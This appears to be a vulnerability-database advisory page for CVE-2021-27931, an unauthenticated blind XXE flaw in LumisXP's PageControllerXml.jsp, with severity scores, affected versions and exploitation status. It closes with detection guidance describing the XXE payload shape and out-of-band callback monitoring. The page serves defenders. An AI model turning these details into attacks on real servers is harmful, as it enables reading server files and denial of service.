cbcvebase.
CVE-2021-27931
published 2021-03-03

CVE-2021-27931: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XXE via an API request to PageControllerXml.jsp. One can send a request…

PriorityP182critical9.1CVSS 3.1
AVNACLPRNUINSUCHINAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
18.61%
96.9th percentile
LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XXE via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.

Affected

1 ranges
VendorProductVersion rangeFixed in
lumislumis_experience_platform< 10.0.010.0.0

Detection & IOCsextracted from sources · hover to see the quote

urlPageControllerXml.jsp
  • Detect unauthenticated POST/GET requests targeting the endpoint PageControllerXml.jsp, particularly those containing an XXE payload (DOCTYPE declaration with ENTITY referencing external or internal resources).
  • Use interactsh/OOB HTTP callback detection to confirm blind XXE exploitation — a successful exploit triggers an outbound HTTP interaction from the server.
  • ·The XXE is blind — direct response-based detection is insufficient. OOB (out-of-band) interaction monitoring (e.g., via interactsh or DNS/HTTP callback infrastructure) is required to confirm exploitation.

CVSS provenance

nvdv3.19.1CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:P
vulncheck9.1CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.